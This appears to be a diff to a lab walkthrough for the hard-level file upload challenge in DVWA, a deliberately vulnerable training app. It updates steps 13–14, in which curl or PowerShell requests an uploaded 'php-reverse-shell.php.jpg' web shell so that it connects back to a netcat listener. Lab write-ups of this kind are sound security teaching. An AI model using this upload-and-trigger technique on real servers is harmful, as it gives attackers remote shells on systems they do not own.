rojounooo/hacking-dvwa/File Upload/file_upload_hard.md

 13. Navigate to the uploaded webshell

-    - The uploaded file was saved to http://<ip address>/dvwa/hackable/upload/php-reverse-shell.php.jpg
+    - The uploaded file was saved to http://localhost/dvwa/hackable/upload/php-reverse-shell.php.jpg

-    - Alternatively run `curl -s http://<ip address>/dvwa/hackable/upload/php-reverse-shell.php.jpg` in another terminal
+    - Alternatively run `Invoke-WebRequest -Uri http://localhost/dvwa/hackable/upload/php-reverse-shell.php.jpg -UseBasicParsing` in another Powershell terminal

 14. On the netcat listener look a connection